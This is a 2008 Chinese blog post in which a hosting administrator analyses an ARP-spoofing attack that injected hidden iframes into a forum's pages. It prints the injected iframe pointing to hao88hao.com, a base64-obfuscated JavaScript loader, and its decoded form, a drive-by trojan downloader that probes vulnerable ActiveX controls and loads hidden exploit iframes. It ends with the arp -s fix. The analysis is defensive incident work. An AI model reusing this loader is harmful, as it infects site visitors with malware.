机房再次被arp攻击，这次更狠毒了，hao88hao.com木马相关

Posted on May 23, 2008 by gkp

昨天晚上，midifan的站长报告说论坛有时候提示下载forumdisplay.php，同时页面乱码。打开网站刷了几次后发现确实有此情况，查看页面源代码发现前面有一段可疑代码

<iframe src=hxxp://hao88hao.com/cn10.htm width=20 height=0 frameborder=0></iframe>
判定机房有机器中了arp病毒，冒充网关在数据包植入iframe代码后将请求发到真正的网关
下载此htm文件，代码如下

<iframe src=hxxp://hao88hao.com/xi/yes.htm width=100 height=0></iframe>
<script src=’hxxp://s27.cnzz.com/stat.php?id=905799&web_id=905799′ language=’JavaScript’ charset=’gb2312′></script>
<script src=’hxxp://s31.cnzz.com/stat.php?id=908607&web_id=908607′ language=’JavaScript’ charset=’gb2312′></script>

包括另外一个iframe，和两个统计信息。。。
再看此htm的内容

<script>
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out=””;while(i<len){do{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)break;do{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}return out}
document.write(base64decode (“PHNjcmlwdD53aW5kb3cub25lcnJvcj1mdW5jdGlvbigpe3JldHVybiB0cnVlO308L3NjcmlwdD4NCjxTY3JpcHQgTGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCXZhciBjb29rID0gInNpbGVudHdtIjsNCgkNCglmdW5jdGlvbiBzZXRDb29raWUobmFtZSwgdmFsdWUsIGV4cGlyZSkgDQoJeyAgIA0KCQl3aW5kb3cuZG9jdW1lbnQuY29va2llID0gbmFtZSArICI9IiArIGVzY2FwZSh2YWx1ZSkgKyAoKGV4cGlyZSA9PSBudWxsKSA/ICIiIDogKCI7IGV4cGlyZXM9IiArIGV4cGlyZS50b0dNVFN0cmluZygpKSk7DQoJfQ0KDQoJZnVuY3Rpb24gZ2V0Q29va2llKE5hbWUpIA0KCXsgICANCgkJdmFyIHNlYXJjaCA9IE5hbWUgKyAiPSI7DQoJCWlmICh3aW5kb3cuZG9jdW1lbnQuY29va2llLmxlbmd0aCA+IDApIA0KCQl7IA0KCQkJb2Zmc2V0ID0gd2luZG93LmRvY3VtZW50LmNvb2tpZS5pbmRleE9mKHNlYXJjaCk7DQoJCQlpZiAob2Zmc2V0ICE9IC0xKSANCgkJCXsgDQoJCQkJb2Zmc2V0ICs9IHNlYXJjaC5sZW5ndGg7ICAgICAgIA0KCQkJICBlbmQgPSB3aW5kb3cuZG9jdW1lbnQuY29va2llLmluZGV4T2YoIjsiLCBvZmZzZXQpICAgICAgIA0KCQkJICBpZiAoZW5kID09IC0xKQ0KCQkJICAgIGVuZCA9IHdpbmRvdy5kb2N1bWVudC5jb29raWUubGVuZ3RoOw0KCQkJICByZXR1cm4gdW5lc2NhcGUod2luZG93LmRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcob2Zmc2V0LCBlbmQpKTsNCgkJCSB9DQoJCSB9DQoJICByZXR1cm4gbnVsbDsNCgl9DQoNCglmdW5jdGlvbiByZWdpc3RlcihuYW1lKSANCgl7DQoJCXZhciB0b2RheSA9IG5ldyBEYXRlKCk7DQoJCXZhciBleHBpcmVzID0gbmV3IERhdGUoKTsNCgkJZXhwaXJlcy5zZXRUaW1lKHRvZGF5LmdldFRpbWUoKSArIDEwMDAqNjAqNjAqMjQpOw0KCQlzZXRDb29raWUoY29vaywgbmFtZSwgZXhwaXJlcyk7DQoJfQ0KDQoJZnVuY3Rpb24gb3BlbldNKCkgDQoJew0KCQl2YXIgYyA9IGdldENvb2tpZShjb29rKTsNCgkJaWYgKGMgIT0gbnVsbCkgDQoJCXsNCgkgIAlyZXR1cm47DQoJCX0NCgkJDQoJCXJlZ2lzdGVyKGNvb2spOw0KCQkNCgkJd2luZG93LmRlZmF1bHRTdGF0dXM9Ik1qM0kiOw0KCQkJDQoJCXRyeXsgdmFyIGU7DQoJCQl2YXIgYWRvPShkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJvYmplY3QiKSk7DQoJCQlhZG8uc2V0QXR0cmlidXRlKCJjbGFzc2lkIiwiY2xzaWQ6QkQ5NkM1NTYtNjVBMy0xMUQwLTk4M0EtMDBDMDRGQzI5RTM2Iik7DQoJCQl2YXIgYXM9YWRvLmNyZWF0ZW9iamVjdCgiQWRvZGIuU3RyZWFtIiwiIil9DQoJCWNhdGNoKGUpe307DQoJCWZpbmFsbHl7DQoJCQlpZihlIT0iW29iamVjdCBFcnJvcl0iKXsNCgkJCQlkb2N1bWVudC53cml0ZSgiPGlmcmFtZSB3aWR0aD01MCBoZWlnaHQ9MCBzcmM9MTQuaHRtPjwvaWZyYW1lPiIpfQ0KCQkJZWxzZQ0KCQkJewkNCgkJCQl0cnl7IHZhciBqOw0KCQkJCQl2YXIgcmVhbDExPW5ldyBBY3RpdmVYT2JqZWN0KCJJRVJQIisiQ3RsLkkiKyJFUlBDdGwuMSIpO30NCgkJCQljYXRjaChqKXt9Ow0KCQkJCWZpbmFsbHl7aWYoaiE9IltvYmplY3QgRXJyb3JdIil7aWYobmV3IEFjdGl2ZVhPYmplY3QoIklFUlBDdGwuSUVSUEN0bC4xIikuUGxheWVyUHJvcGVydHkoIlBST0RVQ1RWRVJTSU9OIik8PSI2LjAuMTQuNTUyIikNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7ZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9MTAgaGVpZ2h0PTAgc3JjPXJsLmh0bT48L2lmcmFtZT4nKX0NCiAgICAgICAgICAgICAgICAgICAgICAgICBlbHNlDQogICAgICAgICAgICAgICAgICAgICAgICAgew0KCQkJCQlkb2N1bWVudC53cml0ZSgnPGlmcmFtZSB3aWR0aD0xMCBoZWlnaHQ9MCBzcmM9bmV3Lmh0bT48L2lmcmFtZT4nKX19fQ0KDQoJCQkJdHJ5eyB2YXIgZzsNCgkJCQkJdmFyIGdsd29ybGQ9bmV3IEFjdGl2ZVhPYmplY3QoIkdMSUVEb3duLklFRG93bi4xIik7fQ0KCQkJCWNhdGNoKGcpe307DQoJCQkJZmluYWxseXtpZihnIT0iW29iamVjdCBFcnJvcl0iKXsNCgkJCQkJZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgc3R5bGU9ZGlzcGxheTpub25lIHNyYz1sei5odG0+PC9pZnJhbWU+Jyl9fQ0KDQoJCQkJdHJ5eyB2YXIgaDsNCgkJCQkJdmFyIHN0b3JtPW5ldyBBY3RpdmVYT2JqZWN0KCJNUFMuU3Rvcm1QbGF5ZXIuMSIpO30NCgkJCQljYXRjaChoKXt9Ow0KCQkJCWZpbmFsbHl7aWYoaCE9IltvYmplY3QgRXJyb3JdIil7DQoJCQkJCWRvY3VtZW50LndyaXRlKCc8aWZyYW1lIHN0eWxlPWRpc3BsYXk6bm9uZSBzcmM9YmYuaHRtPjwvaWZyYW1lPicpfX0NCg0KCQkJCXRyeXsgdmFyIGY7DQoJCQkJCXZhciB0aHVuZGVyPW5ldyBBY3RpdmVYT2JqZWN0KCJEUENsaWVudC5Wb2QiKTt9DQoJCQkJY2F0Y2goZil7fTsNCgkJCQlmaW5hbGx5eyBpZihmIT0iW29iamVjdCBFcnJvcl0iKXsNCgkJCQkJZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9NTAgaGVpZ2h0PTAgc3JjPXhsLmh0bT48L2lmcmFtZT4nKX19DQoNCgkJCQlpZihmPT0iW29iamVjdCBFcnJvcl0iICYmIGc9PSJbb2JqZWN0IEVycm9yXSIgJiYgaD09IltvYmplY3QgRXJyb3JdIiAmJiBqPT0iW29iamVjdCBFcnJvcl0iKQ0KCQkJCXtsb2NhdGlvbi5yZXBsYWNlKCJhYm91dDpibGFuayIpO30NCgkJCX19DQoJfQ0KDQpvcGVuV00oKTsNCjwvc2NyaXB0Pg==”));
</script><!-- var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<len){do{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)break;do{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)break;out+=String.fromCharCode((c1<>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)break;out+=String.fromCharCode(((c2&0XF)<>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)break;out+=String.fromCharCode(((c3&0x03)<

又是老一套，拜托能不能有点创意？
逆向base64解码后的结果：

<script>window.onerror=function(){return true;}</script>
<Script Language=”JScript”>
var cook = “silentwm”;

function setCookie(name, value, expire)
{
window.document.cookie = name + “=” + escape(value) + ((expire == null) ? “” : (“; expires=” + expire.toGMTString()));
}

function getCookie(Name)
{
var search = Name + “=”;
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(“;”, offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}

function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}

function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}

register(cook);

window.defaultStatus=”Mj3I”;

try{ var e;
var ado=(document.createElement(“object”));
ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″);
var as=ado.createobject(“Adodb.Stream”,””)}
catch(e){};
finally{
if(e!=”[object Error]”){
document.write(“<iframe width=50 height=0 src=14.htm></iframe>”)}
else
{
try{ var j;
var real11=new ActiveXObject(“IERP”+”Ctl.I”+”ERPCtl.1″);}
catch(j){};
finally{if(j!=”[object Error]”){if(new ActiveXObject(“IERPCtl.IERPCtl.1”).PlayerProperty(“PRODUCTVERSION”)<=”6.0.14.552″)
{document.write(‘<iframe width=10 height=0 src=rl.htm></iframe>’)}
else
{
document.write(‘<iframe width=10 height=0 src=new.htm></iframe>’)}}}

try{ var g;
var glworld=new ActiveXObject(“GLIEDown.IEDown.1″);}
catch(g){};
finally{if(g!=”[object Error]”){
document.write(‘<iframe style=display:none src=lz.htm></iframe>’)}}

try{ var h;
var storm=new ActiveXObject(“MPS.StormPlayer.1″);}
catch(h){};
finally{if(h!=”[object Error]”){
document.write(‘<iframe style=display:none src=bf.htm></iframe>’)}}

try{ var f;
var thunder=new ActiveXObject(“DPClient.Vod”);}
catch(f){};
finally{ if(f!=”[object Error]”){
document.write(‘<iframe width=50 height=0 src=xl.htm></iframe>’)}}

if(f==”[object Error]” && g==”[object Error]” && h==”[object Error]” && j==”[object Error]”)
{location.replace(“about:blank”);}
}}
}

openWM();
</script>
可以看出是一个典型的js trojan downloader，客户正常访问正常页面后就有可能被放木马。。。国内的网络环境实在是险恶啊。。。自己的机器安全了，周围机器不安全一样没用

最后的解决办法，通过arp -s命令绑死网关ip和mac (thanks delphij)，杜绝伪造。

This entry was posted in 电脑相关 and tagged arp, 服务器, 木马. Bookmark the permalink.

1 Response to 机房再次被arp攻击，这次更狠毒了，hao88hao.com木马相关

musiXboy says:

May 24, 2008 at 12:10 am

你需要一个强制换行的代码。。。。。。

Reply

Leave a Reply Cancel reply